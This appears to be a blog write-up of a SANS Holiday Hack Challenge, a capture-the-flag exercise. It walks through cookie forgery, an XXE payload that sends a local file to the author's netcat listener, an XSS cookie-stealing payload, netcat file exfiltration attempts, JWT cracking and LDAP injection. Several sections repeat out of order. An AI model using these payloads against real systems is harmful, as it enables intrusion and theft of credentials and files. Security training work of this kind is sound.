I obtained the BOLO - Munchkin Mole Report.docx, GreatBookPage3.pdf, MEMO - Password Policy Reminder.docx, Naughty and Nice List.csv, Naughty and Nice list.docx.
Mail Server
The nmap scan also revealed a mail server at 10.142.0.5. I tried reading e-mails and sending phishing e-mails by logging via telnet. Then I read the hints and found out that there might be an easier way in. So, I set up ssh forwarding, set my browser to use a proxy, and typed “10.142.0.5/robots.txt” into my browser. I looked at robots.txt and found a file that was disallowed. It was the source code for the cookie: cookie.txt.
The hints for this one were given by: Pepper Minstix. I found a useful resource that lets people test node.js modules in their browser called runkit + npm. I found the aes256 module and played around with it.
var aes256 = require(“aes256” 1.0.2)
var key = ‘santaisonabender’;
var encrypted = ‘AAAAAAAAAAAAAAAAAAAAAA’; var plaintext = ‘’;
console.log(encrypted);
var decrypted = aes256.decrypt(key, encrypted); console.log(decrypted);
if (decrypted === plaintext){
console.log(‘equal’);
}
I found out that the IV is completely dropped by this module. In the program, it’s aes256 encrypted and base64 encoded. So to decrypt, it would be base64 decoded and aes256 decrypted. 22 A’s are required because when 16 characters - the IV are base64 encoded, it’s drawn out to 22 characters. I played with base64 encoding to see what happens to come by that bit of information that 16 characters are padded out to 22.
The hints provided by Pepper Minstix hinted at changing the cookie. The code appeared as though it compared the plaintext variable in the decryption function to the plaintext value in the cookie. The plaintext variable in the decryption function’s value is gotten by passing the key and the ciphertext from the cookie to the decryption algorithm. If the ciphertext is 22 characters, those characters are dropped, leaving it blank. I’m not sure why it’s blank given that the key should still passed to the algorithm, but it worked, so I didn’t really question it. I would guess it’s the way that node.js handles undefined objects, but I’m not sure.
I changed the cookie in my browser, using Developer Tools in Firefox. I left the plaintext blank and put 22 A’s in the cipher text.
Then I looked at the response and saw /account.html. Typed in 10.142.0.5/account.html and I was logged into
alabaster.snowball’s account. I found that I could log into other accounts using the
same method as well, but changing the user account to whatever user I wanted to be. In alabaster.snowball’s account, I found hints to get access to
the EMI server. Namely, Alabaster saying that he would click on any link in any e-mail
containing the words gingerbread, cookie, recipe. Minty Candycane sent Alabaster
Snowball an e-mail asking about DDE Injection, as well as sending a proof of concept
found here: http://mail.northpolechristmastown.com/attachments/
dde_exmaple_minty_candycane.png.
I obtained the BOLO - Munchkin Mole Report.docx, GreatBookPage3.pdf, MEMO - Password Policy Reminder.docx, Naughty and Nice List.csv, Naughty and Nice list.docx.
Mail Server
The nmap scan also revealed a mail server at 10.142.0.5. I tried reading e-mails and sending phishing e-mails by logging via telnet. Then I read the hints and found out that there might be an easier way in. So, I set up ssh forwarding, set my browser to use a proxy, and typed “10.142.0.5/robots.txt” into my browser. I looked at robots.txt and found a file that was disallowed. It was the source code for the cookie: cookie.txt.
Cookie.txt |
The hints for this one were given by: Pepper Minstix. I found a useful resource that lets people test node.js modules in their browser called runkit + npm. I found the aes256 module and played around with it.
var aes256 = require(“aes256” 1.0.2)
var key = ‘santaisonabender’;
var encrypted = ‘AAAAAAAAAAAAAAAAAAAAAA’; var plaintext = ‘’;
console.log(encrypted);
var decrypted = aes256.decrypt(key, encrypted); console.log(decrypted);
if (decrypted === plaintext){
console.log(‘equal’);
}
I found out that the IV is completely dropped by this module. In the program, it’s aes256 encrypted and base64 encoded. So to decrypt, it would be base64 decoded and aes256 decrypted. 22 A’s are required because when 16 characters - the IV are base64 encoded, it’s drawn out to 22 characters. I played with base64 encoding to see what happens to come by that bit of information that 16 characters are padded out to 22.
The hints provided by Pepper Minstix hinted at changing the cookie. The code appeared as though it compared the plaintext variable in the decryption function to the plaintext value in the cookie. The plaintext variable in the decryption function’s value is gotten by passing the key and the ciphertext from the cookie to the decryption algorithm. If the ciphertext is 22 characters, those characters are dropped, leaving it blank. I’m not sure why it’s blank given that the key should still passed to the algorithm, but it worked, so I didn’t really question it. I would guess it’s the way that node.js handles undefined objects, but I’m not sure.
I changed the cookie in my browser, using Developer Tools in Firefox. I left the plaintext blank and put 22 A’s in the cipher text.
Changing the cookie. |
Minty Candycane DDE Example |
I posted those pics earlier, in the section about the Holiday Hack Challenge Questions.
EAAS Server
The nmap scan found this server at 10.142.0.13. The hints for this challenge were provided by Sugar Plum Mary. Again, used ssh port forwarding to pivot to this machine, and changed the proxy in my browser to allow me to see this web page.
Logging onto the eaas server, there is an area to submit requests to build elves using xml.
EAAS Web Site |
Click on the Elf Checking Service to Exploit this web site.
Not always Upload Capability that is vulnerable, but when it is.... |
This particular site is vulnerable to and External XML Entities attack. The attack detailed here works: https://pen-testing.sans.org/blog/ 2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities. Below is the dtd file that I submitted to the eaas server:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE demo [
<!ELEMENT demo ANY >
<!ENTITY % extentity SYSTEM "http://x.x.x.x:6666/sweets.dtd"> %extentity;
%inception;
%sendit;
]
<
Below is the dtd file that I put on my server that I use to test vulnerabilities with.
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % dataismine SYSTEM "file:///c:/greatbook.txt">
<!ENTITY % inception "<!ENTITY % sendit SYSTEM ‘http://
x.x.x.x:6667/?%dataismine;'>">
Upload DTD XXE Exploit that borrows a file... |
I used the python module SimpleHTTPServer to serve sweets.dtd so I
didn’t have to serve a full website. I made sure I was in a directory
I wasn’t afraid for people to see the files in considering that
SimpleHTTPServer serves the current directory by default.
python -m SimpleHTTPServer 6666Then I had a netcat listener running to catch greatbook.txt nc -nvlp 6667 > greatbook.txt
Serving Sweets on my borrowing Server |
Great Book Page! |
EMI Server
I wasn’t successful obtaining this file. I tried phishing alabaster snow using the hints
detailed above in the Mail Server Section. The hints for this one were given by Shinny
Upatree. For whatever reason, I only got Alabaster Snowball to successfully connect to
me once or twice, and the same payload would not work another time. I tried the proof
of concept that Minty Candycane submitted. I tried turning it around and using the
(New-Object System.Net.WebClient).UploadFile(). I tried running ping and capturing
the traffic on my server to test connectivity. I tried using nc to send the file to myself as
nc x.x.x.x 6666 < C:\\GreatBookPage7.pdf. I tried nc x.x.x.x 6666 <
C:\\GreatBookPage7.pdf thinking I might need to escape the < sign. I tried to offload
the file onto the smb share owned by the elves or one of the other servers owned by the elves since I have access to them. I tried to offload the file to the l2s Server since I could break out of rbash on it. Found out the ip for the l2s server by doing:
/bin/netstat -n.
10.142.0.11
I put the listener in a hidden folder on the l2s server. (That could make things a bit easier for other players, if they found the hidden folder, if I was actually successful. :))
EDB Server
This one was vulnerable to XSS. The hints for this one were given by: Wunorse Openslae. I was having trouble with syntax on this one. The IP for this one was 10.142.0.6. I used ssh forwarding and set up a proxy on my browser. Navigating to 10.142.0.6, you see a login page. If you click on the Support link, you’re presented with a form to help get your login credentials if you’ve forgotten them. The message area is vulnerable to XSS. If you view the source of the page, at the bottom there is javascript that shows how the credential is stored. The credential is stored in local storage as np-auth. If you view the robots.txt page, you will see that the dev page is disallowed. This gives the LDAP information that is needed later to exploit this server.
I used the XSS filter evasion techniques denoted here until I found one that popped an alert box, then changed the payload:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Here is the XSS that I used:
<IMG SRC=# onerror=window.open(“http://x.x.x.x/cookiecatcher.php? cookie="+document.cookie)>
It just plain looks weird, but I’m not awesome with javascript. I found it after playing around with the syntax a bit.
/bin/netstat -n.
10.142.0.11
I put the listener in a hidden folder on the l2s server. (That could make things a bit easier for other players, if they found the hidden folder, if I was actually successful. :))
EDB Server
This one was vulnerable to XSS. The hints for this one were given by: Wunorse Openslae. I was having trouble with syntax on this one. The IP for this one was 10.142.0.6. I used ssh forwarding and set up a proxy on my browser. Navigating to 10.142.0.6, you see a login page. If you click on the Support link, you’re presented with a form to help get your login credentials if you’ve forgotten them. The message area is vulnerable to XSS. If you view the source of the page, at the bottom there is javascript that shows how the credential is stored. The credential is stored in local storage as np-auth. If you view the robots.txt page, you will see that the dev page is disallowed. This gives the LDAP information that is needed later to exploit this server.
I used the XSS filter evasion techniques denoted here until I found one that popped an alert box, then changed the payload:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Here is the XSS that I used:
<IMG SRC=# onerror=window.open(“http://x.x.x.x/cookiecatcher.php? cookie="+document.cookie)>
It just plain looks weird, but I’m not awesome with javascript. I found it after playing around with the syntax a bit.
On my server, I had a php program that I found that logs the cookie, found here:
https://breakthesecurity.cysecurity.org/2011/09/how-to-create-cookie-stealer-coding-in- php-get-via-email.html
I served it using the development module in php
sudo php -s 0.0.0.0:80
Then I decoded the np-auth token using py-jwt. I didn’t need a secret to decode it. I tried changing the expiration on that token, but I didn’t have the secret to successfully forging a new token.
I didn’t know that I had to crack the secret until a friend gave me a pointer.
I used jwtcrack to crack it and got the secret “3lv3s”.
I used the secret to forge a token with py-jwt.
I changed the local storage to hold a token named np-auth, with the value of the newly forged key.
I just got into the edb/ldap server the night that the challenge is due, so I didn't finish getting that flag. Hints give away what it is vulnerable to. Also, I knew what the other servers were vulnerable to, and nmap says this is running ldap, hence the reason I know its the ldap one.
If you look at robots.txt, you see that the /dev folder is supposed to be disallowed in the search results. Looking at the dev folder, you see this:
Update: Well, that didn't take long. I'm holding off on reading write-ups until I solve these. It paid off. I returned all the records from reading this post on the SANS Pen Testing blog.
https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap
Getting past this was annoying until I figured out what to do.
So basically what happens is the radio button on the web page has to be checked for variable "IsElf" to be true, else "IsElf" is false. If "isElf" from the request form is not equal to true, then isElf is reindeer. If "isElf" form the request form is equal to true, then isElf is elf. These represent the ou in LDAP. So I did this query and it returned Rudolph. I'm wondering how it returned Rudolph. Look about two sentences ago-ifElf is false then ou = reindeer. That is how Rudolph was returned. Duh to me. Then I noticed the scrollbar at the bottom.
So how did everyone else's records return? I honestly have no idea how this worked. I will have to study it more. But, I changed the attributes as described in the article like so:
It returned everyone's password hashes as well. Nice!
Either crack it or try Google because it's an MD5 Hash.
Log out and attempt to log in as Santa Claus...
NPPD Server
We weren’t allowed to attack this one, but we could use it to get more information than was intended.
The people on the naughty and nice list could be compared to the infractions on the database which can then be used to determine how many infractions could be done to be placed on the naughty list. It could potentially be used to see who moles are as well.
https://breakthesecurity.cysecurity.org/2011/09/how-to-create-cookie-stealer-coding-in- php-get-via-email.html
I served it using the development module in php
sudo php -s 0.0.0.0:80
Then I decoded the np-auth token using py-jwt. I didn’t need a secret to decode it. I tried changing the expiration on that token, but I didn’t have the secret to successfully forging a new token.
Alabaster Snowball's JWT Token |
Blank Key |
Alabaster's decoded JWT Token |
I didn’t know that I had to crack the secret until a friend gave me a pointer.
I used jwtcrack to crack it and got the secret “3lv3s”.
Alabaster's Cracked JWT Secret. |
I used the secret to forge a token with py-jwt.
Forged Alabaster's JWT Token. |
I changed the local storage to hold a token named np-auth, with the value of the newly forged key.
Changing Local Storage np-auth |
EDB Server |
I just got into the edb/ldap server the night that the challenge is due, so I didn't finish getting that flag. Hints give away what it is vulnerable to. Also, I knew what the other servers were vulnerable to, and nmap says this is running ldap, hence the reason I know its the ldap one.
If you look at robots.txt, you see that the /dev folder is supposed to be disallowed in the search results. Looking at the dev folder, you see this:
Dev Listing |
LDAP LDIF Template |
https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap
Getting past this was annoying until I figured out what to do.
EDB Find Elves Source Code |
Returning Everyone's Records |
Changing HTML to get Password Hashes |
Santa's Password Hash! |
Santa's Cracked Password |
Entering Password for Santa Panel |
Letter From The Wizard! |
NPPD Server
We weren’t allowed to attack this one, but we could use it to get more information than was intended.
The people on the naughty and nice list could be compared to the infractions on the database which can then be used to determine how many infractions could be done to be placed on the naughty list. It could potentially be used to see who moles are as well.
Subscribe to:
Posts (Atom)